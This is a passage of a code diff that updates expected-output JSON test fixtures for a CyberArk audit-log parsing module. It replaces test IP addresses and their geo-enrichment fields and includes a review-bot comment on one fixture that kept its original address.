"CPM Verify Password Failed", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 08:04:11\n 2021-03-15T15:04:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\n address=34.66.114.180;retriescount=1;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", - "cyberarkpas.audit.reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 08:04:11\n 2021-03-15T15:04:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). 
\n\n address=81.2.69.143;retriescount=1;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Error", "cyberarkpas.audit.station": "10.0.1.20", "cyberarkpas.audit.timestamp": "Mar 15 08:04:11", - "destination.address": "34.66.114.180", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 38.6583, - "destination.geo.location.lon": -77.2481, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", - "destination.ip": "34.66.114.180", + "destination.address": "81.2.69.143", + "destination.geo.city_name": "London", + "destination.geo.continent_name": "Europe", + "destination.geo.country_iso_code": "GB", + "destination.geo.country_name": "United Kingdom", + "destination.geo.location.lat": 51.5142, + "destination.geo.location.lon": -0.0931, + "destination.geo.region_iso_code": "GB-ENG", + "destination.geo.region_name": "England", + "destination.ip": "81.2.69.143", "destination.user.name": "ELASTIC.local\\bart", "event.action": "cpm verify password failed", "event.category": [ 
@@ -298,17 +302,17 @@
 "event.kind": "event",
 "event.module": "cyberarkpas",
 "event.outcome": "failure",
- "event.reason": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ",
+ "event.reason": "Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). ",
 "event.severity": 7,
 "event.timezone": "-02:00",
 "event.type": [
 "error"
 ],
- "file.path": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart",
+ "file.path": "Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart",
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 12652,
+ "log.offset": 12528,
 "log.syslog.priority": "7",
 "network.direction": "outbound",
 "observer.hostname": "VAULT",
@@ -317,7 +321,7 @@
 "observer.version": "11.7.0000",
 "related.ip": [
 "10.0.1.20",
- "34.66.114.180"
+ "81.2.69.143"
 ],
 "related.user": [
 "ELASTIC.local\\bart",
@@ -336,42 +340,43 @@ { "@timestamp": "2021-03-15T16:35:01.000Z", "cyberarkpas.audit.action": "CPM Verify Password Failed", - "cyberarkpas.audit.ca_properties.address": "34.66.114.180", - "cyberarkpas.audit.ca_properties.cpm_error_details": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ", + "cyberarkpas.audit.ca_properties.address": "81.2.69.143", + "cyberarkpas.audit.ca_properties.cpm_error_details": "Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). ", "cyberarkpas.audit.ca_properties.cpm_status": "failure", "cyberarkpas.audit.ca_properties.creation_method": "PVWA", "cyberarkpas.audit.ca_properties.device_type": "Operating System", "cyberarkpas.audit.ca_properties.last_fail_date": "1615826099", "cyberarkpas.audit.ca_properties.last_task": "VerifyTask", - "cyberarkpas.audit.ca_properties.logon_domain": "34.66.114.180", + "cyberarkpas.audit.ca_properties.logon_domain": "81.2.69.143", "cyberarkpas.audit.ca_properties.policy_id": "WinDomain", "cyberarkpas.audit.ca_properties.reset_immediately": "VerifyTask", "cyberarkpas.audit.ca_properties.retries_count": "2", "cyberarkpas.audit.ca_properties.user_name": "ELASTIC.local\\bart", "cyberarkpas.audit.desc": "CPM Verify Password Failed", - "cyberarkpas.audit.extra_details.other.address": "34.66.114.180", + "cyberarkpas.audit.extra_details.other.address": "81.2.69.143", "cyberarkpas.audit.extra_details.other.retriescount": "2", "cyberarkpas.audit.extra_details.username": "ELASTIC.local\\bart", - "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart", + "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart", "cyberarkpas.audit.iso_timestamp": "2021-03-15T16:35:01Z", "cyberarkpas.audit.issuer": "PasswordManager", "cyberarkpas.audit.message": 
"CPM Verify Password Failed", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 09:35:01\n 2021-03-15T16:35:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\n address=34.66.114.180;retriescount=2;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", - "cyberarkpas.audit.reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 09:35:01\n 2021-03-15T16:35:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). 
\n\n address=81.2.69.143;retriescount=2;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Error", "cyberarkpas.audit.station": "10.0.1.20", "cyberarkpas.audit.timestamp": "Mar 15 09:35:01", - "destination.address": "34.66.114.180", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 38.6583, - "destination.geo.location.lon": -77.2481, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", - "destination.ip": "34.66.114.180", + "destination.address": "81.2.69.143", + "destination.geo.city_name": "London", + "destination.geo.continent_name": "Europe", + "destination.geo.country_iso_code": "GB", + "destination.geo.country_name": "United Kingdom", + "destination.geo.location.lat": 51.5142, + "destination.geo.location.lon": -0.0931, + "destination.geo.region_iso_code": "GB-ENG", + "destination.geo.region_name": "England", + "destination.ip": "81.2.69.143", "destination.user.name": "ELASTIC.local\\bart", "event.action": "cpm verify password failed", "event.category": [ 
@@ -382,17 +387,17 @@
 "event.kind": "event",
 "event.module": "cyberarkpas",
 "event.outcome": "failure",
- "event.reason": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ",
+ "event.reason": "Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). ",
 "event.severity": 7,
 "event.timezone": "-02:00",
 "event.type": [
 "error"
 ],
- "file.path": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart",
+ "file.path": "Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart",
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 16937,
+ "log.offset": 16769,
 "log.syslog.priority": "7",
 "network.direction": "outbound",
 "observer.hostname": "VAULT",
@@ -401,7 +406,7 @@
 "observer.version": "11.7.0000",
 "related.ip": [
 "10.0.1.20",
- "34.66.114.180"
+ "81.2.69.143"
 ],
 "related.user": [
 "ELASTIC.local\\bart",
@@ -467,7 +472,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 21222,
+ "log.offset": 21010,
 "log.syslog.priority": "7",
 "network.direction": "internal",
 "observer.hostname": "VAULT",
@@ -542,7 +547,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 25232,
+ "log.offset": 25020,
 "log.syslog.priority": "7",
 "network.direction": "internal",
 "observer.hostname": "VAULT",
@@ -617,7 +622,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 29415,
+ "log.offset": 29203,
 "log.syslog.priority": "7",
 "network.direction": "internal",
 "observer.hostname": "VAULT",
@@ -692,7 +697,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 33542,
+ "log.offset": 33330,
 "log.syslog.priority": "7",
 "network.direction": "internal",
 "observer.hostname": "VAULT",
@@ -768,7 +773,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 37627,
+ "log.offset": 37415,
 "log.syslog.priority": "7",
 "network.direction": "internal",
 "observer.hostname": "VAULT",
@@ -846,7 +851,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 41831,
+ "log.offset": 41619,
 "log.syslog.priority": "7",
 "network.direction": "internal",
 "observer.hostname": "VAULT",
@@ -924,7 +929,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 46092,
+ "log.offset": 45880,
 "log.syslog.priority": "7",
 "network.direction": "internal",
 "observer.hostname": "VAULT",
@@ -1002,7 +1007,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 50461,
+ "log.offset": 50249,
 "log.syslog.priority": "7",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
@@ -1028,42 +1033,43 @@ { "@timestamp": "2021-03-15T18:05:16.000Z", "cyberarkpas.audit.action": "CPM Verify Password Failed", - "cyberarkpas.audit.ca_properties.address": "34.66.114.180", - "cyberarkpas.audit.ca_properties.cpm_error_details": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ", + "cyberarkpas.audit.ca_properties.address": "81.2.69.143", + "cyberarkpas.audit.ca_properties.cpm_error_details": "Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). ", "cyberarkpas.audit.ca_properties.cpm_status": "failure", "cyberarkpas.audit.ca_properties.creation_method": "PVWA", "cyberarkpas.audit.ca_properties.device_type": "Operating System", "cyberarkpas.audit.ca_properties.last_fail_date": "1615831516", "cyberarkpas.audit.ca_properties.last_task": "VerifyTask", - "cyberarkpas.audit.ca_properties.logon_domain": "34.66.114.180", + "cyberarkpas.audit.ca_properties.logon_domain": "81.2.69.143", "cyberarkpas.audit.ca_properties.policy_id": "WinDomain", "cyberarkpas.audit.ca_properties.reset_immediately": "VerifyTask", "cyberarkpas.audit.ca_properties.retries_count": "3", "cyberarkpas.audit.ca_properties.user_name": "ELASTIC.local\\bart", "cyberarkpas.audit.desc": "CPM Verify Password Failed", - "cyberarkpas.audit.extra_details.other.address": "34.66.114.180", + "cyberarkpas.audit.extra_details.other.address": "81.2.69.143", "cyberarkpas.audit.extra_details.other.retriescount": "3", "cyberarkpas.audit.extra_details.username": "ELASTIC.local\\bart", - "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart", + "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart", "cyberarkpas.audit.iso_timestamp": "2021-03-15T18:05:16Z", "cyberarkpas.audit.issuer": "PasswordManager", 
"cyberarkpas.audit.message": "CPM Verify Password Failed", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 11:05:16\n 2021-03-15T18:05:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\n address=34.66.114.180;retriescount=3;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", - "cyberarkpas.audit.reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 11:05:16\n 2021-03-15T18:05:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). 
\n\n address=81.2.69.143;retriescount=3;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Error", "cyberarkpas.audit.station": "10.0.1.20", "cyberarkpas.audit.timestamp": "Mar 15 11:05:16", - "destination.address": "34.66.114.180", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 38.6583, - "destination.geo.location.lon": -77.2481, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", - "destination.ip": "34.66.114.180", + "destination.address": "81.2.69.143", + "destination.geo.city_name": "London", + "destination.geo.continent_name": "Europe", + "destination.geo.country_iso_code": "GB", + "destination.geo.country_name": "United Kingdom", + "destination.geo.location.lat": 51.5142, + "destination.geo.location.lon": -0.0931, + "destination.geo.region_iso_code": "GB-ENG", + "destination.geo.region_name": "England", + "destination.ip": "81.2.69.143", "destination.user.name": "ELASTIC.local\\bart", "event.action": "cpm verify password failed", "event.category": [ 
@@ -1074,17 +1080,17 @@
 "event.kind": "event",
 "event.module": "cyberarkpas",
 "event.outcome": "failure",
- "event.reason": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ",
+ "event.reason": "Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). ",
 "event.severity": 7,
 "event.timezone": "-02:00",
 "event.type": [
 "error"
 ],
- "file.path": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart",
+ "file.path": "Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart",
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 55122,
+ "log.offset": 54910,
 "log.syslog.priority": "7",
 "network.direction": "outbound",
 "observer.hostname": "VAULT",
@@ -1093,7 +1099,7 @@
 "observer.version": "11.7.0000",
 "related.ip": [
 "10.0.1.20",
- "34.66.114.180"
+ "81.2.69.143"
 ],
 "related.user": [
 "ELASTIC.local\\bart",
@@ -1112,42 +1118,43 @@ { "@timestamp": "2021-03-16T09:50:19.000Z", "cyberarkpas.audit.action": "CPM Verify Password Failed", - "cyberarkpas.audit.ca_properties.address": "34.66.114.180", - "cyberarkpas.audit.ca_properties.cpm_error_details": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ", + "cyberarkpas.audit.ca_properties.address": "81.2.69.143", + "cyberarkpas.audit.ca_properties.cpm_error_details": "Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). ", "cyberarkpas.audit.ca_properties.cpm_status": "failure", "cyberarkpas.audit.ca_properties.creation_method": "PVWA", "cyberarkpas.audit.ca_properties.device_type": "Operating System", "cyberarkpas.audit.ca_properties.last_fail_date": "1615888216", "cyberarkpas.audit.ca_properties.last_task": "VerifyTask", - "cyberarkpas.audit.ca_properties.logon_domain": "34.66.114.180", + "cyberarkpas.audit.ca_properties.logon_domain": "81.2.69.143", "cyberarkpas.audit.ca_properties.policy_id": "WinDomain", "cyberarkpas.audit.ca_properties.reset_immediately": "VerifyTask", "cyberarkpas.audit.ca_properties.retries_count": "4", "cyberarkpas.audit.ca_properties.user_name": "ELASTIC.local\\bart", "cyberarkpas.audit.desc": "CPM Verify Password Failed", - "cyberarkpas.audit.extra_details.other.address": "34.66.114.180", + "cyberarkpas.audit.extra_details.other.address": "81.2.69.143", "cyberarkpas.audit.extra_details.other.retriescount": "4", "cyberarkpas.audit.extra_details.username": "ELASTIC.local\\bart", - "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart", + "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart", "cyberarkpas.audit.iso_timestamp": "2021-03-16T09:50:19Z", "cyberarkpas.audit.issuer": "PasswordManager", 
"cyberarkpas.audit.message": "CPM Verify Password Failed", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 16 02:50:19\n 2021-03-16T09:50:19Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\n address=34.66.114.180;retriescount=4;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", - "cyberarkpas.audit.reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 16 02:50:19\n 2021-03-16T09:50:19Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). 
\n\n address=81.2.69.143;retriescount=4;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Error", "cyberarkpas.audit.station": "10.0.1.20", "cyberarkpas.audit.timestamp": "Mar 16 02:50:19", - "destination.address": "34.66.114.180", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 38.6583, - "destination.geo.location.lon": -77.2481, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", - "destination.ip": "34.66.114.180", + "destination.address": "81.2.69.143", + "destination.geo.city_name": "London", + "destination.geo.continent_name": "Europe", + "destination.geo.country_iso_code": "GB", + "destination.geo.country_name": "United Kingdom", + "destination.geo.location.lat": 51.5142, + "destination.geo.location.lon": -0.0931, + "destination.geo.region_iso_code": "GB-ENG", + "destination.geo.region_name": "England", + "destination.ip": "81.2.69.143", "destination.user.name": "ELASTIC.local\\bart", "event.action": "cpm verify password failed", "event.category": [ 
@@ -1158,17 +1165,17 @@
 "event.kind": "event",
 "event.module": "cyberarkpas",
 "event.outcome": "failure",
- "event.reason": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ",
+ "event.reason": "Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). ",
 "event.severity": 7,
 "event.timezone": "-02:00",
 "event.type": [
 "error"
 ],
- "file.path": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart",
+ "file.path": "Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart",
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 59407,
+ "log.offset": 59151,
 "log.syslog.priority": "7",
 "network.direction": "outbound",
 "observer.hostname": "VAULT",
@@ -1177,7 +1184,7 @@
 "observer.version": "11.7.0000",
 "related.ip": [
 "10.0.1.20",
- "34.66.114.180"
+ "81.2.69.143"
 ],
 "related.user": [
 "ELASTIC.local\\bart",
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/428_retrieve_ssh_key.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/428_retrieve_ssh_key.log-expected.json
index 71ac263e3f5a..01219805d4e4 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/428_retrieve_ssh_key.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/428_retrieve_ssh_key.log-expected.json
@@ -23,11 +23,6 @@
 "cyberarkpas.audit.station": "127.0.0.1",
 "cyberarkpas.audit.timestamp": "Mar 11 09:43:44",
 "destination.address": "34.123.103.115",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "34.123.103.115",
 "destination.user.name": "adrian",
 "event.action": "retrieve ssh key",
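Review bot: In the 428_retrieve_ssh_key fixture the hunk at `@@ -23,11 +23,6 @@` keeps `"destination.address": "34.123.103.115"` and `"destination.ip": "34.123.103.115"` while only dropping the `destination.geo.*` fields, so this file stops exercising geo enrichment for destination.ip, whereas the other fixtures in this commit replace their public addresses (with 81.2.69.143, 67.43.156.14, 67.43.156.12, which look like GeoIP test-database addresses) and keep geo output. If the intent is to stop using real public addresses in test data, this IP presumably should be substituted the same way in the `.log` input and the expected file regenerated, rather than silently losing the geo fields. If instead the expected file was regenerated and the removal reflects the test GeoIP database having no entry for this address, that is worth a sentence in the commit description. The same applies to the two later hunks of this file at `@@ -101,11 +96,6 @@` and `@@ -177,11 +167,6 @@`.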
@@ -101,11 +96,6 @@
 "cyberarkpas.audit.station": "127.0.0.1",
 "cyberarkpas.audit.timestamp": "Mar 11 13:08:48",
 "destination.address": "34.123.103.115",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "34.123.103.115",
 "destination.user.name": "adrian",
 "event.action": "retrieve ssh key",
@@ -177,11 +167,6 @@
 "cyberarkpas.audit.station": "127.0.0.1",
 "cyberarkpas.audit.timestamp": "Mar 15 06:18:52",
 "destination.address": "34.123.103.115",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "34.123.103.115",
 "destination.user.name": "adrian",
 "event.action": "retrieve ssh key",
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/4_user_authentication.log b/x-pack/filebeat/module/cyberarkpas/audit/test/4_user_authentication.log
index 283cc15f94ec..d512d591f3c5 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/4_user_authentication.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/4_user_authentication.log
